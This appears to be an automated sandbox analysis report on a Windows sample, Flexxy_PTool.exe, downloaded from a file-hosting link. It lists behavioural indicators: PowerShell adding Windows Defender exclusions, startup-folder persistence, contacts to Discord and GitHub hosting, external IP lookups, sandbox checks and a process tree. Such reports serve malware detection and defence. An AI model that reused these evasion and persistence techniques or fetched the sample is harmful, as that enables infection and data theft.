Analysis
-
max time kernel
145s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 14:50
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ufile.io/pk7dnmlo
Resource
win10v2004-20240508-en
General
-
Target
https://ufile.io/pk7dnmlo
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2328 powershell.exe 6028 powershell.exe 5108 powershell.exe 5884 powershell.exe 1320 powershell.exe 1188 powershell.exe -
Drops startup file 4 IoCs
Processes:
Flexxy_PTool.exeFlexxy_PTool.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe Flexxy_PTool.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe Flexxy_PTool.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe Flexxy_PTool.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe Flexxy_PTool.exe -
Loads dropped DLL 64 IoCs
Processes:
Flexxy_PTool.exeFlexxy_PTool.exepid process 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe 2632 Flexxy_PTool.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI58802\python310.dll upx behavioral1/memory/5396-107-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_ctypes.pyd upx behavioral1/memory/5396-118-0x00007FFCCCFF0000-0x00007FFCCCFFF000-memory.dmp upx behavioral1/memory/5396-117-0x00007FFCBBF20000-0x00007FFCBBF44000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_bz2.pyd upx behavioral1/memory/5396-123-0x00007FFCBBEF0000-0x00007FFCBBF1D000-memory.dmp upx behavioral1/memory/5396-122-0x00007FFCCB910000-0x00007FFCCB929000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_uuid.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\pywin32_system32\pythoncom310.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\win32\win32api.pyd upx behavioral1/memory/5396-154-0x00007FFCCC740000-0x00007FFCCC74D000-memory.dmp upx behavioral1/memory/5396-159-0x00007FFCBBD90000-0x00007FFCBBDBB000-memory.dmp upx behavioral1/memory/5396-158-0x00007FFCBBDC0000-0x00007FFCBBE7C000-memory.dmp upx behavioral1/memory/5396-157-0x00007FFCBBE80000-0x00007FFCBBEAE000-memory.dmp upx behavioral1/memory/5396-156-0x00007FFCCC5E0000-0x00007FFCCC5ED000-memory.dmp upx behavioral1/memory/5396-155-0x00007FFCBBEB0000-0x00007FFCBBEE4000-memory.dmp upx behavioral1/memory/5396-153-0x00007FFCCB720000-0x00007FFCCB739000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_cffi_backend.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\pywin32_system32\pywintypes310.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\pyexpat.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_overlapped.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_multiprocessing.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\_asyncio.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\libcrypto-1_1.dll upx behavioral1/memory/5396-163-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp upx behavioral1/memory/5396-162-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp upx behavioral1/memory/5396-166-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp upx behavioral1/memory/5396-171-0x00007FFCCC300000-0x00007FFCCC310000-memory.dmp upx behavioral1/memory/5396-170-0x00007FFCBBD40000-0x00007FFCBBD55000-memory.dmp upx behavioral1/memory/5396-176-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp upx behavioral1/memory/5396-175-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp upx behavioral1/memory/5396-174-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\psutil\_psutil_windows.pyd upx behavioral1/memory/5396-179-0x00007FFCBBD00000-0x00007FFCBBD18000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\zstandard\backend_c.cp310-win_amd64.pyd upx behavioral1/memory/5396-182-0x00007FFCBAED0000-0x00007FFCBAF57000-memory.dmp upx behavioral1/memory/5396-184-0x00007FFCBBA60000-0x00007FFCBBA74000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\charset_normalizer\md.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI58802\charset_normalizer\md__mypyc.cp310-win_amd64.pyd upx behavioral1/memory/5396-190-0x00007FFCCC220000-0x00007FFCCC22B000-memory.dmp upx behavioral1/memory/5396-195-0x00007FFCB9DC0000-0x00007FFCB9ED8000-memory.dmp upx behavioral1/memory/5396-194-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp upx behavioral1/memory/5396-193-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp upx behavioral1/memory/5396-192-0x00007FFCB9EE0000-0x00007FFCB9F06000-memory.dmp upx behavioral1/memory/5396-200-0x00007FFCCBC80000-0x00007FFCCBC8B000-memory.dmp upx behavioral1/memory/5396-199-0x00007FFCB9D80000-0x00007FFCB9DB8000-memory.dmp upx behavioral1/memory/5396-206-0x00007FFCBAEC0000-0x00007FFCBAECB000-memory.dmp upx behavioral1/memory/5396-205-0x00007FFCBBA50000-0x00007FFCBBA5C000-memory.dmp upx behavioral1/memory/5396-204-0x00007FFCBD2C0000-0x00007FFCBD2CB000-memory.dmp upx behavioral1/memory/5396-203-0x00007FFCBD6E0000-0x00007FFCBD6EC000-memory.dmp upx behavioral1/memory/5396-202-0x00007FFCCB960000-0x00007FFCCB96B000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
Processes:
flow ioc 233 discord.com 234 discord.com 198 raw.githubusercontent.com 199 raw.githubusercontent.com 229 raw.githubusercontent.com 211 discord.com 231 discord.com 205 discord.com 207 discord.com 210 discord.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 196 api.ipify.org 197 api.ipify.org 209 api.ipify.org 227 api.ipify.org 228 api.ipify.org 232 api.ipify.org -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe pyinstaller -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{BF2B78E5-11BC-44D4-91F4-8D96925D1FEF} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Flexxy_PTool.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepid process 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 5396 Flexxy_PTool.exe 4124 powershell.exe 4124 powershell.exe 4124 powershell.exe 5664 powershell.exe 5664 powershell.exe 5664 powershell.exe 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe 6028 powershell.exe 6028 powershell.exe 6028 powershell.exe 1320 powershell.exe 1320 powershell.exe 1320 powershell.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Flexxy_PTool.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 5396 Flexxy_PTool.exe Token: SeIncreaseQuotaPrivilege 6024 WMIC.exe Token: SeSecurityPrivilege 6024 WMIC.exe Token: SeTakeOwnershipPrivilege 6024 WMIC.exe Token: SeLoadDriverPrivilege 6024 WMIC.exe Token: SeSystemProfilePrivilege 6024 WMIC.exe Token: SeSystemtimePrivilege 6024 WMIC.exe Token: SeProfSingleProcessPrivilege 6024 WMIC.exe Token: SeIncBasePriorityPrivilege 6024 WMIC.exe Token: SeCreatePagefilePrivilege 6024 WMIC.exe Token: SeBackupPrivilege 6024 WMIC.exe Token: SeRestorePrivilege 6024 WMIC.exe Token: SeShutdownPrivilege 6024 WMIC.exe Token: SeDebugPrivilege 6024 WMIC.exe Token: SeSystemEnvironmentPrivilege 6024 WMIC.exe Token: SeRemoteShutdownPrivilege 6024 WMIC.exe Token: SeUndockPrivilege 6024 WMIC.exe Token: SeManageVolumePrivilege 6024 WMIC.exe Token: 33 6024 WMIC.exe Token: 34 6024 WMIC.exe Token: 35 6024 WMIC.exe Token: 36 6024 WMIC.exe Token: SeIncreaseQuotaPrivilege 6024 WMIC.exe Token: SeSecurityPrivilege 6024 WMIC.exe Token: SeTakeOwnershipPrivilege 6024 WMIC.exe Token: SeLoadDriverPrivilege 6024 WMIC.exe Token: SeSystemProfilePrivilege 6024 WMIC.exe Token: SeSystemtimePrivilege 6024 WMIC.exe Token: SeProfSingleProcessPrivilege 6024 WMIC.exe Token: SeIncBasePriorityPrivilege 6024 WMIC.exe Token: SeCreatePagefilePrivilege 6024 WMIC.exe Token: SeBackupPrivilege 6024 WMIC.exe Token: SeRestorePrivilege 6024 WMIC.exe Token: SeShutdownPrivilege 6024 WMIC.exe Token: SeDebugPrivilege 6024 WMIC.exe Token: SeSystemEnvironmentPrivilege 6024 WMIC.exe Token: SeRemoteShutdownPrivilege 6024 WMIC.exe Token: SeUndockPrivilege 6024 WMIC.exe Token: SeManageVolumePrivilege 6024 WMIC.exe Token: 33 6024 WMIC.exe Token: 34 6024 WMIC.exe Token: 35 6024 WMIC.exe Token: 36 6024 WMIC.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 5664 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 6028 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 3360 WMIC.exe Token: SeSecurityPrivilege 3360 WMIC.exe Token: SeTakeOwnershipPrivilege 3360 WMIC.exe Token: SeLoadDriverPrivilege 3360 WMIC.exe Token: SeSystemProfilePrivilege 3360 WMIC.exe Token: SeSystemtimePrivilege 3360 WMIC.exe Token: SeProfSingleProcessPrivilege 3360 WMIC.exe Token: SeIncBasePriorityPrivilege 3360 WMIC.exe Token: SeCreatePagefilePrivilege 3360 WMIC.exe Token: SeBackupPrivilege 3360 WMIC.exe Token: SeRestorePrivilege 3360 WMIC.exe Token: SeShutdownPrivilege 3360 WMIC.exe Token: SeDebugPrivilege 3360 WMIC.exe Token: SeSystemEnvironmentPrivilege 3360 WMIC.exe Token: SeRemoteShutdownPrivilege 3360 WMIC.exe Token: SeUndockPrivilege 3360 WMIC.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
Processes:
7zG.exetaskmgr.exepid process 5812 7zG.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe -
Suspicious use of SendNotifyMessage 44 IoCs
Processes:
taskmgr.exepid process 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe 5780 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Flexxy_PTool.exeFlexxy_PTool.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeFlexxy_PTool.exeFlexxy_PTool.exeFlexxy_PTool.exeFlexxy_PTool.execmd.execmd.execmd.exedescription pid process target process PID 5880 wrote to memory of 5396 5880 Flexxy_PTool.exe Flexxy_PTool.exe PID 5880 wrote to memory of 5396 5880 Flexxy_PTool.exe Flexxy_PTool.exe PID 5396 wrote to memory of 5508 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 5508 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 5960 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 5960 5396 Flexxy_PTool.exe cmd.exe PID 5960 wrote to memory of 6024 5960 cmd.exe WMIC.exe PID 5960 wrote to memory of 6024 5960 cmd.exe WMIC.exe PID 5396 wrote to memory of 6084 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 6084 5396 Flexxy_PTool.exe cmd.exe PID 6084 wrote to memory of 5196 6084 cmd.exe netsh.exe PID 6084 wrote to memory of 5196 6084 cmd.exe netsh.exe PID 5396 wrote to memory of 3012 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 3012 5396 Flexxy_PTool.exe cmd.exe PID 3012 wrote to memory of 4124 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 4124 3012 cmd.exe powershell.exe PID 5396 wrote to memory of 5648 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 5648 5396 Flexxy_PTool.exe cmd.exe PID 5648 wrote to memory of 5664 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 5664 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 2328 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 2328 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 6028 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 6028 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 1320 5648 cmd.exe powershell.exe PID 5648 wrote to memory of 1320 5648 cmd.exe powershell.exe PID 5396 wrote to memory of 4136 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 4136 5396 Flexxy_PTool.exe cmd.exe PID 4136 wrote to memory of 3360 4136 cmd.exe WMIC.exe PID 4136 wrote to memory of 3360 4136 cmd.exe WMIC.exe PID 5396 wrote to memory of 116 5396 Flexxy_PTool.exe wmic.exe PID 5396 wrote to memory of 116 5396 Flexxy_PTool.exe wmic.exe PID 5396 wrote to memory of 4872 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 4872 5396 Flexxy_PTool.exe cmd.exe PID 4872 wrote to memory of 3372 4872 cmd.exe WMIC.exe PID 4872 wrote to memory of 3372 4872 cmd.exe WMIC.exe PID 5396 wrote to memory of 5252 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 5252 5396 Flexxy_PTool.exe cmd.exe PID 5252 wrote to memory of 1372 5252 cmd.exe WMIC.exe PID 5252 wrote to memory of 1372 5252 cmd.exe WMIC.exe PID 5396 wrote to memory of 4724 5396 Flexxy_PTool.exe cmd.exe PID 5396 wrote to memory of 4724 5396 Flexxy_PTool.exe cmd.exe PID 4724 wrote to memory of 2028 4724 cmd.exe WMIC.exe PID 4724 wrote to memory of 2028 4724 cmd.exe WMIC.exe PID 3400 wrote to memory of 2632 3400 Flexxy_PTool.exe Flexxy_PTool.exe PID 3400 wrote to memory of 2632 3400 Flexxy_PTool.exe Flexxy_PTool.exe PID 2632 wrote to memory of 4776 2632 Flexxy_PTool.exe cmd.exe PID 2632 wrote to memory of 4776 2632 Flexxy_PTool.exe cmd.exe PID 5620 wrote to memory of 5840 5620 Flexxy_PTool.exe Flexxy_PTool.exe PID 5620 wrote to memory of 5840 5620 Flexxy_PTool.exe Flexxy_PTool.exe PID 5840 wrote to memory of 4420 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 4420 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 5220 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 5220 5840 Flexxy_PTool.exe cmd.exe PID 5220 wrote to memory of 1152 5220 cmd.exe WMIC.exe PID 5220 wrote to memory of 1152 5220 cmd.exe WMIC.exe PID 5840 wrote to memory of 2796 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 2796 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 2632 5840 Flexxy_PTool.exe cmd.exe PID 5840 wrote to memory of 2632 5840 Flexxy_PTool.exe cmd.exe PID 2796 wrote to memory of 3372 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 3372 2796 cmd.exe netsh.exe PID 2632 wrote to memory of 2304 2632 cmd.exe powershell.exe PID 2632 wrote to memory of 2304 2632 cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ufile.io/pk7dnmlo1⤵PID:2868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4268,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:11⤵PID:772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4888,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4048 /prefetch:11⤵PID:1228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5240,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:11⤵PID:1984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5420,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:81⤵PID:3644
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5452,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:81⤵PID:2440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5956,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:81⤵PID:4548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6256,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:81⤵PID:640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6304 /prefetch:81⤵
- Modifies registry class
PID:4704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=5920,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6068 /prefetch:11⤵PID:4324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6456,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:11⤵PID:3988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=6876,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6912 /prefetch:81⤵PID:5216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:11⤵PID:5224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7352,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7360 /prefetch:81⤵PID:5288
-
